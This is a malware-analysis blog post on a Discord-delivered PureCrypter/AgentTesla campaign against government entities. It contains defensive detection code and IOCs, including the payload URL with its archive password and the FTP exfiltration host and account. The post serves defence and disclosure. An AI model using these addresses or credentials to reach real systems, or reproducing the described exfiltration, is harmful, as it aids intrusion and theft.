PureCrypter targets government entities through Discord

Abhay Yadav
|
February 21, 2023

Executive Summary

Menlo Labs has uncovered a previously unknown threat actor running an evasive campaign, distributed via Discord, that uses the PureCrypter downloader and targets government entities. The campaign uses the domain of a compromised non-profit organization as Command and Control (C2) infrastructure to deliver a secondary payload, and has been observed delivering several malware families including Redline Stealer, AgentTesla, Eternity, Blackmoon and Philadelphia Ransomware. Our investigation started when Menlo’s Cloud Security Platform blocked password-protected archive files across multiple government customers in the Asia-Pacific (APAC) and North America regions.

Menlo Labs assesses that this threat actor will keep using the compromised infrastructure for as long as it remains available before moving to new hosting. Leaving credentials inside the malware is an OpSec failure on the actor's part, but it leaves a trail for analysts to follow. In this case Menlo’s Cloud Security Platform blocked the attack, which gave Menlo Labs visibility into it and a starting point for tracking the actor.

Infection Chain

diagram illustrating download to password protected zip to purecrypter

Threat Intelligence

Threat analysis showed that PureCrypter downloads a secondary payload, believed to be AgentTesla.

PureCrypter is a downloader that delivers Remote Access Trojans (RATs) and infostealers. It has been sold since March 2021 via “hxxps[://]purecoder.sellix.io/.” AgentTesla is a .NET backdoor/infostealer whose capabilities include stealing saved passwords from several browsers, clipboard logging, keylogging and screen capture; it runs on all versions of Windows.

In our investigation we found that AgentTesla connects to an FTP server where it stores the victim’s stolen credentials. The FTP server appears to have been taken over: leaked credentials for the domain were found online, suggesting that the threat actors used them to gain access to the server.

Screenshot: compromised FTP server showing collected victim information

It is also noteworthy that the download link for the secondary malware points to a compromised domain belonging to a non-profit organization whose leaked credentials were likewise found online.

A sample similar to the AgentTesla malware we analyzed was discovered in a phishing email with the subject "FW: New Order no. 5959" from "Alejandro Gonzalo" (e052450f2@891f4e7e1668[.]com). The malicious attachment, "Nuevo pedido 7887979-800898.gz", contained the same FTP server credentials found in the first case.

From the same sender address, another malicious email titled "New Order" was also uncovered, carrying an attachment called "Ppurchase order6007979-709797790.gz". It too used the same FTP server, ftp[://]ftp.mgcpakistan[.]com, as part of its infection process.

The same FTP server (ftp[://]ftp.mgcpakistan[.]com) was also seen in a campaign using OneNote to deliver malware: attackers have been sending phishing emails with links to malicious OneNote files that download additional malware or steal information from the victim's device. Altogether, the Labs team found 106 files using this FTP server.

Infection Vector/Technical Details

In this campaign, Discord was used to host the payload and a link to it was sent via email. To evade existing defenses, the payload is delivered as a password-protected ZIP file, which stops any scanner that cannot supply the password from inspecting the contents. The screenshot below shows the poor detection rate of these password-protected archives on VirusTotal.

Screenshot showing 1 security vendor and no sandboxes flagged file as malicious

The attacker took the following steps to deliver the payload:

  • An email containing a Discord CDN URL pointing to a malicious password-protected ZIP file is sent to the victim (https://cdn[.]discordapp.com/attachments/1006638283645784218/1048923462128914512/Private_file__dont_share.zip, password 1234, MD5 967f9bc90202925e1f941c8ea1db2c94).
  • The ZIP contains a .NET loader, PureCrypter (MD5 5420dcbae4f1fba8afe85cb03dcd9bfc), which tries to download a secondary payload from the compromised non-profit organization’s domain shown in the screenshot below. At the time of investigation the organization’s website was down, so we were unable to retrieve the secondary payload.
screenshot of code
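As an added example (my own code, not the article's or Menlo's tooling), here is how a mail-gateway or sandbox check can act on the two signals described above without ever needing the archive password: it extracts Discord CDN attachment URLs from the message body and reads the "encrypted" bit from the ZIP central directory of whatever that link returns. The function and field names are assumptions; the sample email body is constructed around the URL reported in this post, and the test ZIP is built with the encryption flag set rather than actually encrypted.

```python
import io
import re
import zipfile

# Discord CDN attachment links take the shape
# https://cdn.discordapp.com/attachments/<channel id>/<attachment id>/<filename>
DISCORD_ATTACHMENT_RE = re.compile(
    r"https?://cdn\.discordapp\.com/attachments/\d+/\d+/[^\s\"'<>]+",
    re.IGNORECASE,
)
ARCHIVE_SUFFIXES = (".zip", ".rar", ".7z", ".gz", ".iso", ".img")


def find_discord_attachment_urls(body: str) -> list:
    """Return every Discord CDN attachment URL found in an email body."""
    return DISCORD_ATTACHMENT_RE.findall(body)


def encrypted_members(zip_bytes: bytes) -> list:
    """Names of ZIP entries whose general-purpose flag has bit 0 set.

    Bit 0 means "entry is encrypted". It lives in the central directory, which
    is never encrypted, so a scanner can tell that it cannot inspect the
    contents without knowing or cracking the password."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [info.filename for info in zf.infolist() if info.flag_bits & 0x1]


def triage_email(body: str, fetched: dict) -> dict:
    """Score an email whose Discord link(s) were followed.

    `fetched` maps each URL to the bytes retrieved from it (supplied directly
    here; a real pipeline would download them in a sandbox)."""
    urls = find_discord_attachment_urls(body)
    findings = []
    for url in urls:
        if url.lower().endswith(ARCHIVE_SUFFIXES):
            findings.append(f"archive hosted on Discord CDN: {url}")
        data = fetched.get(url)
        if data and zipfile.is_zipfile(io.BytesIO(data)):
            locked = encrypted_members(data)
            if locked:
                findings.append(f"password-protected ZIP entries: {locked}")
    return {"urls": urls, "findings": findings, "block": bool(findings)}


def make_flagged_zip(name: str, payload: bytes) -> bytes:
    """Constructed test data: a normal ZIP with the 'encrypted' flag bit set in
    both the local file header and the central directory entry. The payload is
    not really encrypted, but parsers see the same flag a password-protected
    archive carries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, payload)
    data = bytearray(buf.getvalue())
    local = data.index(b"PK\x03\x04")    # sig(4) ver(2) flags(2): flags at +6
    data[local + 6] |= 0x01
    central = data.index(b"PK\x01\x02")  # sig(4) made_by(2) ver(2) flags(2): +8
    data[central + 8] |= 0x01
    return bytes(data)


# Constructed sample message; the URL is the one reported in this article.
SAMPLE_URL = ("https://cdn.discordapp.com/attachments/1006638283645784218/"
              "1048923462128914512/Private_file__dont_share.zip")
SAMPLE_BODY = f"Please review the private file: {SAMPLE_URL}\nRegards"
SAMPLE_FETCHED = {SAMPLE_URL: make_flagged_zip("Private_file__dont_share.exe",
                                               b"MZ-constructed")}

if __name__ == "__main__":
    print(triage_email(SAMPLE_BODY, SAMPLE_FETCHED))
```

The point of reading the flag rather than trying to open the entry is that a gateway can block or quarantine an archive it is unable to inspect instead of letting it through as "clean", which is exactly the gap the low VirusTotal detection count above reflects.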

Although we could not download the second-stage payload from the PureCrypter sample above (MD5 5420dcbae4f1fba8afe85cb03dcd9bfc), we identified similar samples that were seen downloading payloads from the compromised non-profit organization. Further investigation showed that this payload was AgentTesla and that it communicated with an FTP server located in Pakistan (as mentioned in the Threat Intelligence section above). The technical analysis below is of that sample (MD5 c3b90a10922eef6d635c6c786f29a5d0).

screenshot of code

The downloaded binary is packed to evade initial detection. It carries the AgentTesla payload DES-encrypted in its resource section, as shown in the screenshot below.

screenshot of code

The DES IV and key (des.IV and des.Key) used for the encrypted payload are shown in the screenshot below.

screenshot of des.IV and des.Key of encrypted payload

AgentTesla uses process hollowing to inject its payload (MD5 bcf031ab2b43dc382b365ba3df9f09bc) into cvtres.exe, a legitimate Microsoft binary (the resource-to-object file converter shipped with the .NET Framework) that is present on standard Windows installations, so the process name on its own looks benign.
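The host-side telltale of this technique is a cvtres.exe started by something other than a build tool. As an added example (my own code, not Menlo's and not derived from the samples), the heuristics below run over constructed Sysmon-style process-creation events: an unexpected parent, a parent living in a user-writable directory, and a bare command line with no resource-file arguments. The allowlist of expected parents, the field names and the sample events are assumptions to tune against your own telemetry.

```python
import json
import ntpath

# Assumed allowlist of build tools that legitimately spawn cvtres.exe; adjust
# it to what your telemetry shows on developer workstations and build agents.
EXPECTED_PARENTS = {"csc.exe", "vbc.exe", "link.exe", "cl.exe",
                    "msbuild.exe", "devenv.exe"}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\",
                 "\\programdata\\", "\\public\\")


def basename(path: str) -> str:
    return ntpath.basename(path or "").lower()


def assess_process_event(event: dict) -> list:
    """Heuristics for a hollowed cvtres.exe, applied to one process-creation
    event (Sysmon Event ID 1 style field names, assumed)."""
    findings = []
    if basename(event.get("Image")) != "cvtres.exe":
        return findings
    parent_image = event.get("ParentImage", "")
    parent = basename(parent_image)
    if parent not in EXPECTED_PARENTS:
        findings.append(f"cvtres.exe started by unexpected parent {parent or '<unknown>'}")
    if any(seg in parent_image.lower() for seg in USER_WRITABLE):
        findings.append(f"parent runs from a user-writable path: {parent_image}")
    # Hollowing typically creates the host process suspended with nothing but
    # the image path on the command line; a real build invocation passes
    # resource-file arguments. Heuristic, not proof.
    cmdline = event.get("CommandLine", "").strip().strip('"')
    if cmdline.lower() == event.get("Image", "").lower():
        findings.append("cvtres.exe launched with no arguments")
    return findings


def scan(log_lines) -> list:
    """Run the heuristics over JSON-lines telemetry; returns (pid, findings)."""
    hits = []
    for line in log_lines:
        ev = json.loads(line)
        found = assess_process_event(ev)
        if found:
            hits.append((ev.get("ProcessId"), found))
    return hits


# Constructed telemetry: one legitimate compile, one hollowing candidate.
SAMPLE_LOG = [
    json.dumps({"EventID": 1, "ProcessId": 4120,
                "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
                "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe" /NOLOGO /READONLY /MACHINE:x64 "/OUT:C:\proj\obj\app.res"',
                "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"}),
    json.dumps({"EventID": 1, "ProcessId": 5588,
                "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
                "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"',
                "ParentImage": r"C:\Users\victim\AppData\Local\Temp\Private_file__dont_share.exe"}),
]

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_LOG):
        print(pid, findings)
```

None of the three signals is conclusive alone; the second event trips all three, which is the combination worth an alert, while the genuine csc.exe compile trips none.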

AgentTesla XOR-encrypts its configuration. The screenshot below shows the XOR-encoded config.

screenshot of xor encoded config file

Menlo Labs was able to decrypt the config file. The decrypted file is shown below.

screenshot of decrypted config file

The decrypted configuration contains the C2 details of the FTP server to which AgentTesla uploads victim data.
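As an added illustration of the config-recovery step (my own code, not Menlo Labs' tooling, and not the sample's real key or config), the block below recovers a repeating XOR key from an encoded blob by dragging the known-plaintext fragment "ftp://" across it, then pulls the FTP target out of the decoded text. The key, the "|"-delimited layout and the config contents are constructed for the example; the real sample's key and layout appear only in the screenshots above.

```python
import re
import string

PRINTABLE = frozenset(string.printable.encode())


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric: the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(blob: bytes, crib: bytes, max_keylen: int = 16):
    """Crib-drag a known plaintext fragment across an XOR-encoded blob.

    For each candidate key length (shortest first) and each offset, the crib
    fixes key[(offset + i) % keylen] = blob[offset + i] ^ crib[i]. A key is
    accepted only if those equations are mutually consistent and the whole
    blob decrypts to printable text. A crib shorter than the key cannot pin
    every key byte, so key lengths are capped at len(crib).
    Returns (key, plaintext) or None."""
    for keylen in range(1, min(max_keylen, len(crib)) + 1):
        for offset in range(len(blob) - len(crib) + 1):
            key, seen, consistent = bytearray(keylen), [False] * keylen, True
            for i, c in enumerate(crib):
                k = (offset + i) % keylen
                val = blob[offset + i] ^ c
                if seen[k] and key[k] != val:
                    consistent = False
                    break
                key[k], seen[k] = val, True
            if not consistent:
                continue
            plain = xor_bytes(blob, bytes(key))
            if all(b in PRINTABLE for b in plain):
                return bytes(key), plain
    return None


def ftp_targets(plaintext: bytes) -> list:
    """Pull ftp:// URLs out of a decoded config: the C2 detail we care about."""
    return re.findall(r"ftp://[^\s|\"']+", plaintext.decode("ascii", "replace"))


# Constructed sample config and key (not the real sample's values). The
# '|'-separated layout is an assumption made for this example.
SAMPLE_CONFIG = (b"ftp://ftp.example.invalid/|exfil@example.invalid|"
                 b"Pa55w0rd!|keylog=1|screenshot=1|interval=60\n")
SAMPLE_KEY = b"\x5a\xa7\x13\xc4"
SAMPLE_BLOB = xor_bytes(SAMPLE_CONFIG, SAMPLE_KEY)

if __name__ == "__main__":
    key, plain = recover_key(SAMPLE_BLOB, b"ftp://")
    print("key:", key.hex())
    print(plain.decode())
    print("targets:", ftp_targets(plain))
```

The printable-text check is what rejects the many short keys that happen to be consistent with the crib at one offset but turn the rest of the blob into garbage; if a family stores binary fields in its config, replace it with a check on a known delimiter or field count instead.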

Network Communication

AgentTesla exfiltrates data over FTP using the .NET FtpWebRequest class, which needs an FTP server path and credentials; the configuration supplies both, as shown in the screenshot below:

screenshot showing required ftp server path and credentials to send stolen data to server

This screenshot shows how the FtpWebRequest is constructed:

screenshot of code showing how to get FTPWebRequest

Username: “ddd@mgcpakistan[.]com”
Password:

screenshot of code for password

“*password*” - the real password is withheld for security reasons.
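On the wire this exfiltration is a plain FTP login followed by STOR commands, so a network sensor can reconstruct it from the control channel alone. As an added example (not part of the original post), the parser below works over a constructed transcript in a simple "> client" / "< server" format and matches the session against the FTP host and username listed in the IOCs below; the transcript format and the uploaded file name are made up.

```python
# IOCs reported in this article: the FTP host and the account AgentTesla uses.
IOC_FTP_HOSTS = {"ftp.mgcpakistan.com"}
IOC_FTP_USERS = {"ddd@mgcpakistan.com"}


def parse_ftp_session(transcript: str) -> dict:
    """Reconstruct the interesting parts of an FTP control-channel session.

    Input format (constructed for this example): a 'host: <server>' header,
    client lines prefixed '> ' and server replies prefixed '< '. FTP is
    plaintext, so a sensor sees all of this, the PASS line included."""
    session = {"host": None, "user": None, "password_seen": False,
               "logged_in": False, "uploads": []}
    for raw in transcript.splitlines():
        line = raw.strip()
        if line.lower().startswith("host:"):
            session["host"] = line.split(":", 1)[1].strip().lower()
        elif line.startswith("> "):
            cmd, _, arg = line[2:].partition(" ")
            cmd, arg = cmd.upper(), arg.strip()
            if cmd == "USER":
                session["user"] = arg.lower()
            elif cmd == "PASS":
                session["password_seen"] = True
            elif cmd in ("STOR", "APPE", "STOU"):
                session["uploads"].append(arg)
        elif line.startswith("< ") and line[2:5] == "230":
            session["logged_in"] = True   # 230 = login successful
    return session


def assess_session(session: dict) -> list:
    """Turn a parsed session into findings: IOC matches plus the generic
    'authenticated upload over plaintext FTP' signal."""
    findings = []
    if session["host"] in IOC_FTP_HOSTS:
        findings.append(f"FTP server matches known C2 host: {session['host']}")
    if session["user"] in IOC_FTP_USERS:
        findings.append(f"FTP login matches known exfil account: {session['user']}")
    if session["logged_in"] and session["uploads"]:
        findings.append(f"{len(session['uploads'])} file(s) uploaded over plaintext FTP: "
                        + ", ".join(session["uploads"]))
    return findings


# Constructed control-channel capture; the uploaded file name is made up.
SAMPLE_TRANSCRIPT = """host: ftp.mgcpakistan.com
< 220 FTP server ready
> USER ddd@mgcpakistan.com
< 331 Password required
> PASS ********
< 230 Login successful
> TYPE I
< 200 Type set to I
> PASV
< 227 Entering Passive Mode (203,0,113,10,195,80)
> STOR PW_victim-DESKTOP-1A2B3C_2023_02_10_09_15_22.html
< 150 Opening BINARY mode data connection
< 226 Transfer complete
> QUIT
< 221 Goodbye
"""

if __name__ == "__main__":
    for finding in assess_session(parse_ftp_session(SAMPLE_TRANSCRIPT)):
        print(finding)
```

The IOC matches will age out once the actor loses the server; the third finding, an authenticated upload to an external FTP host from an endpoint that has no business doing so, is the durable one and is worth alerting on regardless of destination.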

Conclusion

The Labs team will continue to monitor this threat actor’s activity for changes. The actor does not appear to be a major player in the threat landscape, but its targeting of government entities is reason enough to keep watching it.

IOCs

FTP

“ftp://ftp[.]mgcpakistan[.]com/”
Username: “ddd@mgcpakistan[.]com”

HTTP

cents-ability[.]org

Email (SHA256)

be18d4fc15b51daedc3165112dad779e17389793fe0515d62bbcf00def2c3c2d
5732b89d931b84467ac9f149b2d60f3aee679a5f6472d6b4701202ab2cd80e99

Malware (SHA256)

a7c006a79a6ded6b1cb39a71183123dcaaaa21ea2684a8f199f27e16fcb30e8e
5d649c5aa230376f1a08074aee91129b8031606856e9b4b6c6d0387f35f6629d
f950d207d33507345beeb3605c4e0adfa6b274e67f59db10bd08b91c96e8f5ad
397b94a80b17e7fbf78585532874aba349f194f84f723bd4adc79542d90efed3
7a5b8b448e7d4fa5edc94dcb66b1493adad87b62291be4ddcbd61fb4f25346a8
efc0b3bfcec19ef704697bf0c4fd4f1cfb091dbfee9c7bf456fac02bcffcfedf
c846e7bbbc1f65452bdca87523edf0fd1a58cbd9a45e622e29d480d8d80ac331

Imphash values shared across the 106 FTP files (note that .NET executables import only _CorExeMain from mscoree.dll, so a shared imphash says more about the samples being .NET binaries than about a common origin):

f34d5f2d4577ed6d9ceec516c1f5a744 (86 files)
61259b55b8912888e90f516ca08dc514 (10 files)

Registry key opened by 82 of the 106 FTP files:

HKLM\Software\Microsoft\Fusion\LoggingLevel

This key is read by the .NET Fusion assembly binder to decide whether to log binding failures, so it is consistent with the samples being managed .NET executables rather than a family-specific indicator.

Of the 106 samples, over half shared the following MITRE ATT&CK tactics and techniques:

  • Execution TA0002
      ◦ Windows Management Instrumentation T1047
  • Privilege Escalation TA0004
      ◦ Process Injection T1055
  • Defense Evasion TA0005
      ◦ Disable or Modify Tools T1562.001
      ◦ Virtualization/Sandbox Evasion T1497
      ◦ Process Injection T1055
      ◦ Obfuscated Files or Information T1027
      ◦ Software Packing T1027.002
      ◦ Masquerading T1036
  • Credential Access TA0006
      ◦ OS Credential Dumping T1003
  • Discovery TA0007
      ◦ System Information Discovery T1082
      ◦ Security Software Discovery T1518.001
      ◦ Virtualization/Sandbox Evasion T1497
      ◦ Application Window Discovery T1010
      ◦ Process Discovery T1057
  • Collection TA0009
      ◦ Data from Local System T1005
  • Command and Control TA0011
      ◦ Non-Application Layer Protocol T1095
      ◦ Application Layer Protocol T1071

Other similar files (MD5)

14e4bfe2b41a8cf4b3ab724400629214
f1c29ba01377c35e6f920f0aa626eaf5
5420dcbae4f1fba8afe85cb03dcd9bfc
18e9cd6b282d626e47c2074783a2fa78
2499343e00b0855882284e37bf0fa327
0d8b1ad53fddacf2221409c1c1f3fd70
17f512e1a9f5e35ce5761dba6ccb09cb
b5c60625612fe650be3dcbe558db1bbc
a478540cda34b75688c4c6da4babf973
765f09987f0ea9a3797c82a1c3fced46
bbd003bc5c9d50211645b028833bbeb2
71b4db69df677a2acd60896e11237146
f4eebe921b734d563e539752be05931d
b4fd2d06ac3ea18077848c9e96a25142
1d3c8ca9c0d2d70c656f41f0ac0fe818
785bfaa6322450f1c7fe7f0bf260772d
2fa290d07b56bde282073b955eae573e
d70bb6e2f03e5f456103b9d6e2dc2ee7
0ede257a56a6b1fbd2b1405568b44015
fdd4cd11d278dab26c2c8551e006c4ed
dbcaa05d5ca47ff8c893f47ad9131b29
c9ca95c2a07339edb13784c72f876a60
c3b90a10922eef6d635c6c786f29a5d0
8ef7d7ec24fb7f6b994006e9f339d9af
fa4ffa1f263f5fc67309569975611640
754920678bc60dabeb7c96bfb88273de
2964ce62d3c776ba7cb68a48d6afb06e
8503b56d9585b8c9e6333bb22c610b54
eaaf20fdc4a07418b0c8e85a2e3c9b27
b6c849fcdcda6c6d8367f159047d26c4
de94d596cac180d348a4acdeeaaa9439
3f92847d032f4986026992893acf271e
ae158d61bed131bcfd7d6cecdccde79b